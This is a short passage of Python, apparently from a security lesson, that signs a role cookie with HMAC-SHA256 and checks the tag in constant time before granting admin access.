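    """Server side: emit 'role.tag' where tag = HMAC-SHA256(key, role)."""
    tag = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    return f"{role}.{tag}"


def is_admin_hardened(signed_cookie: str, key: bytes = SERVER_KEY) -> bool:
    """Server side: verify the tag in constant time before trusting the role."""
    role, sep, tag = signed_cookie.rpartition(".")
    if not sep:
        return False
    expected = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected) and role == "admin"
```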